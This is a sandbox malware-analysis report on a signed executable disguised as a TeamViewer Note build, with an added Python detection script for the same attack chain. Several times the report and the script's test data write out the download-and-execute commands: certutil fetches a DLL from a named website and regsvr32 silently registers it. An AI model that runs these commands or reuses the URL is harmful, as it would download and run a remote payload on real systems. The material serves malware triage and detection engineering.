
Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name: cBQPecnQRp (renamed file extension from none to exe)
Analysis ID: 483791
MD5: 53817315b195e328ccc0f56b15b247c7
SHA1: 7bedab96b89d000288b573de0b5693cf49dae47f
SHA256: ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags: exe, HartexLLC, signed

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 47
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cBQPecnQRp.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\cBQPecnQRp.exe' MD5: 53817315B195E328CCC0F56B15B247C7)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 4528 cmdline: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' MD5: D056DF596F6E02A36841E69872AEF7BD)
      • regsvr32.exe (PID: 5340 cmdline: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started
  Author: Florian Roth, oscd.community
  Data:
    Command: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
    CommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
    CommandLine|base64offset|contains:
    Image: C:\Windows\SysWOW64\regsvr32.exe
    NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
    OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
    ParentCommandLine: C:\Windows\System32\cmd.exe
    ParentImage: C:\Windows\SysWOW64\cmd.exe
    ParentProcessId: 6152
    ProcessCommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
    ProcessId: 5340

Sigma detected: Suspicious Certutil Command
Source: Process started
  Author: Florian Roth, juju4, keepwatch
  Data:
    Command: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
    CommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
    CommandLine|base64offset|contains: q!
    Image: C:\Windows\SysWOW64\certutil.exe
    NewProcessName: C:\Windows\SysWOW64\certutil.exe
    OriginalFileName: C:\Windows\SysWOW64\certutil.exe
    ParentCommandLine: C:\Windows\System32\cmd.exe
    ParentImage: C:\Windows\SysWOW64\cmd.exe
    ParentProcessId: 6152
    ProcessCommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
    ProcessId: 4528

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: cBQPecnQRp.exe  Virustotal: Detection: 10%
Multi AV Scanner detection for domain / URL
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll  Virustotal: Detection: 11%

Compliance:

Uses 32bit PE files
Source: cBQPecnQRp.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown  HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificate
Source: cBQPecnQRp.exe  Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb  source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb)  source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00466410 FindFirstFileExW

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe  Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe  Domain query: www.christchurchmvl.org
Source: Joe Sandbox View  ASN Name: AMAZON-AESUS
Source: Joe Sandbox View  JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View  JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown  Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown  Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown  Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown  Network traffic detected: HTTP traffic on port 49772 -> 443
Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 15 Sep 2021 11:47:29 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exe  String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exe  String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exe  String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exe  String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exe  String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exe  String found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exe  String found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exe  String found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exe  String found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exe  String found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exe  String found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp  String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp  String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exe  String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown  DNS traffic detected: queries for: www.christchurchmvl.org
Source: global traffic  HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: */* | User-Agent: Microsoft-CryptoAPI/10.0 | Host: www.christchurchmvl.org
Source: global traffic  HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1 | Accept: */* | User-Agent: CertUtil URL Agent | Host: www.christchurchmvl.org | Cache-Control: no-cache
Source: unknown  HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
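The whole execution story of this sample is the chain in the process tree and the two Sigma hits: cmd.exe runs certutil.exe -urlcache -split -f to fetch a DLL into C:\ProgramData, then regsvr32.exe -s -n -i to load it and call its DllInstall export. The network section shows what that looks like on the wire: two GETs for the same URL, one with the Microsoft-CryptoAPI/10.0 user agent and one with CertUtil URL Agent, both answered 404. Two caveats for anyone triaging from this report: the "System process connects to network (likely due to code injection or exploit)" signature fires on certutil.exe, which here is simply the LOLBin doing the download it was told to do, not an injected process; and because the server returned 404 during the analysis, the second stage was never captured, which is why the report has no configuration, no YARA matches and no further behaviour after regsvr32. The Python below is an added example, not part of the Joe Sandbox report: it tokenizes process-creation command lines, flags the certutil download and the regsvr32 DllInstall call from a user-writable path, correlates the two when they share a parent and a file path, and checks proxy log lines for the two user agents above fetching executable content. The process events and log lines are constructed from this report's process tree and HTTP requests; the log-line format, the rule names and the list of "suspect" directory roots are assumptions of the example.

```python
"""Detection logic for the certutil -> regsvr32 download-and-register chain.
Added example (not part of the Joe Sandbox report).  The event records and
proxy log lines below are constructed to mirror the report's process tree
and HTTP requests; the log format and rule names are this example's own."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

_TOKEN_RE = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")
_URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Assumption: user-writable roots that a legitimate installer rarely registers DLLs from.
_SUSPECT_DLL_ROOTS = (r"c:\programdata", r"c:\users", r"c:\windows\temp", r"c:\temp")


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed Sysmon-style process-creation events modelled on the report's process tree
# (PIDs and command lines as reported), plus two benign controls.
SAMPLE_EVENTS = [
    ProcessEvent(5760, 1000, r"C:\Users\user\Desktop\cBQPecnQRp.exe", r"'C:\Users\user\Desktop\cBQPecnQRp.exe'"),
    ProcessEvent(6152, 5760, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(1368, 6152, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(4528, 6152, r"C:\Windows\SysWOW64\certutil.exe",
                 "certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\\ProgramData\\actXApiLib.dll'"),
    ProcessEvent(5340, 6152, r"C:\Windows\SysWOW64\regsvr32.exe", "regsvr32.exe -s -n -i 'C:\\ProgramData\\actXApiLib.dll'"),
    ProcessEvent(7000, 2000, r"C:\Windows\System32\certutil.exe", "certutil.exe -hashfile C:\\tmp\\setup.msi SHA256"),
    ProcessEvent(7001, 2001, r"C:\Windows\System32\regsvr32.exe", 'regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"'),
]

# Constructed proxy log lines modelled on the two GET requests captured in the report, plus a control.
SAMPLE_HTTP = [
    'GET https://www.christchurchmvl.org/volunteer/actXApiLib.dll 404 "Microsoft-CryptoAPI/10.0"',
    'GET https://www.christchurchmvl.org/volunteer/actXApiLib.dll 404 "CertUtil URL Agent"',
    'GET https://update.example.test/catalog.json 200 "Mozilla/5.0"',
]
_HTTP_RE = re.compile(r'^(?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$')
_LOLBIN_UA = ("certutil url agent", "microsoft-cryptoapi/")
_PAYLOAD_EXT = (".dll", ".exe", ".ps1", ".hta", ".js", ".vbs")


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line honouring single and double quotes only
    (shlex is avoided on purpose: in POSIX mode it eats the backslashes in Windows paths)."""
    return [a or b or c for a, b, c in _TOKEN_RE.findall(cmdline)]


def _basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def _flags(tokens: List[str]) -> set:
    # Windows tools accept both '-' and '/' switch characters; compare case-insensitively.
    return {t[1:].lower() for t in tokens[1:] if t[:1] in "-/"}


def certutil_download(ev: ProcessEvent) -> Optional[Dict]:
    """certutil.exe -urlcache [-split] -f <url> [<outfile>]: ingress tool transfer via a LOLBin."""
    if _basename(ev.image) != "certutil.exe":
        return None
    tokens = tokenize(ev.cmdline)
    flags = _flags(tokens)
    urls = [t for t in tokens if _URL_RE.match(t)]
    if "urlcache" not in flags or not urls:
        return None
    idx = tokens.index(urls[0])  # the positional argument after the URL is the output path
    outfile = tokens[idx + 1] if idx + 1 < len(tokens) and tokens[idx + 1][:1] not in "-/" else None
    return {"rule": "certutil_urlcache_download", "pid": ev.pid, "ppid": ev.ppid,
            "url": urls[0], "outfile": outfile, "force": "f" in flags}


def regsvr32_dllinstall(ev: ProcessEvent) -> Optional[Dict]:
    """regsvr32.exe -n -i <dll>: DllInstall without DllRegisterServer, or a DLL from a user-writable path."""
    if _basename(ev.image) != "regsvr32.exe":
        return None
    tokens = tokenize(ev.cmdline)
    flags = _flags(tokens)
    dlls = [t for t in tokens[1:] if t[:1] not in "-/" and t.lower().endswith(".dll")]
    if not dlls:
        return None
    dll = dlls[0]
    suspicious_path = dll.lower().startswith(_SUSPECT_DLL_ROOTS)
    dllinstall_only = "n" in flags and any(f == "i" or f.startswith("i:") for f in flags)
    if not (suspicious_path or dllinstall_only):
        return None
    return {"rule": "regsvr32_dllinstall", "pid": ev.pid, "ppid": ev.ppid, "dll": dll,
            "silent": "s" in flags, "dllinstall_only": dllinstall_only, "suspicious_path": suspicious_path}


def correlate_chain(events: List[ProcessEvent]) -> List[Dict]:
    """Per-event findings, plus a 'chain' finding when a regsvr32 registers the file that a
    certutil under the same parent downloaded earlier.  Events are assumed to be in creation order."""
    findings: List[Dict] = []
    downloads: Dict[str, Dict] = {}
    for ev in events:
        f = certutil_download(ev)
        if f:
            findings.append(f)
            if f["outfile"]:
                downloads[f["outfile"].lower()] = f
            continue
        f = regsvr32_dllinstall(ev)
        if f:
            findings.append(f)
            dl = downloads.get(f["dll"].lower())
            if dl and dl["ppid"] == f["ppid"]:
                findings.append({"rule": "certutil_to_regsvr32_chain", "parent_pid": f["ppid"],
                                 "download_pid": dl["pid"], "register_pid": f["pid"],
                                 "url": dl["url"], "dll": f["dll"]})
    return findings


def http_lolbin_fetch(line: str) -> Optional[Dict]:
    """certutil / CryptoAPI user agents fetching executable content (CryptoAPI itself only fetches CRLs and certs)."""
    m = _HTTP_RE.match(line)
    if not m:
        return None
    ua, url = m.group("ua").lower(), m.group("url").lower().split("?", 1)[0]
    if ua.startswith(_LOLBIN_UA) and url.endswith(_PAYLOAD_EXT):
        return {"rule": "lolbin_user_agent_payload_fetch", "url": m.group("url"),
                "status": int(m.group("status")), "user_agent": m.group("ua")}
    return None


def run(events: List[ProcessEvent] = SAMPLE_EVENTS, http_lines: List[str] = SAMPLE_HTTP) -> List[Dict]:
    findings = correlate_chain(events)
    findings += [f for f in map(http_lolbin_fetch, http_lines) if f]
    return findings


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Against the constructed input this yields five findings: the certutil download, the regsvr32 DllInstall call, the correlated chain (parent 6152, download 4528, register 5340), and the two user-agent hits; the benign certutil -hashfile and the installer-style regsvr32 from Program Files produce nothing. The chain rule is the one worth paging on: either half alone has legitimate uses, together under one parent they do not.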

System Summary:

Source: cBQPecnQRp.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code functions (50): 1_2_004340B0, 1_2_00432A00, 1_2_0049C051, 1_2_0046207C, 1_2_004520EB, 1_2_00402080, 1_2_004961AB, 1_2_004321AB, 1_2_00402210, 1_2_004443F0, 1_2_0048C4C0, 1_2_004744D0, 1_2_0049E4E7, 1_2_004024F2, 1_2_004685D0, 1_2_00484580, 1_2_004025A0, 1_2_0048E620, 1_2_00402700, 1_2_0045A7C0, 1_2_00484790, 1_2_00402850, 1_2_00424970, 1_2_004029E0, 1_2_00402B70, 1_2_00464CC9, 1_2_00402CF0, 1_2_00402E70, 1_2_0048CFC0, 1_2_0049901A, 1_2_0045B2E0, 1_2_004773C0, 1_2_00401390, 1_2_00433450, 1_2_004454F0, 1_2_0046B48F, 1_2_004514A0, 1_2_004014B0, 1_2_0045154D, 1_2_00433569, 1_2_004755F0, 1_2_0046B5AF, 1_2_00401610, 1_2_00493680, 1_2_00401760, 1_2_0048D7F0, 1_2_004337A0, 1_2_00499809, 1_2_004518BF, 1_2_0048B9A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: String function: 0044F26F appears 71 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Process Stats: CPU usage > 98%
Source: cBQPecnQRp.exe  Binary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe  Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe  Section loaded: actxapilib.dll
Source: cBQPecnQRp.exe  Virustotal: Detection: 10%
Source: cBQPecnQRp.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown  Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: classification engine  Classification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Command line argument: ~GI (1_2_004946D0)
Source: C:\Windows\SysWOW64\certutil.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\certutil.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\certutil.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: cBQPecnQRp.exe  Static file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exe  Static PE information: certificate valid
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb  source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb)  source: cBQPecnQRp.exe
Source: cBQPecnQRp.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00434A6C push eax; ret 1_2_00434A91
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00410AAA push ss; iretd 1_2_00410AAB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044F73C push ecx; ret 1_2_0044F74F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx 1_2_00493991
Source: cBQPecnQRp.exe  Static PE information: section name: .didat
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060  Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Last function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00466410 FindFirstFileExW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044FE43 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe  Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe  Domain query: www.christchurchmvl.org
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00468B1F GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00468DC7 EnumSystemLocalesW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00468E12 EnumSystemLocalesW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00468EAD EnumSystemLocalesW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00468F40 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004691A0 GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004692C6 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004693CC GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0046949B GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0046354D EnumSystemLocalesW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004639F3 GetLocaleInfoW
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_0041E0FC cpuid
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_00440690 GetLocalTime
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext
Source: C:\Users\user\Desktop\cBQPecnQRp.exe  Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext

Mitre Att&ck Matrix

Reconstructed from the flattened matrix, one tactic (table column) per line. Digits in parentheses are the report's per-technique hit badges as extracted; techniques without a badge were not matched by any signature and are the matrix's unmatched placeholder rows.

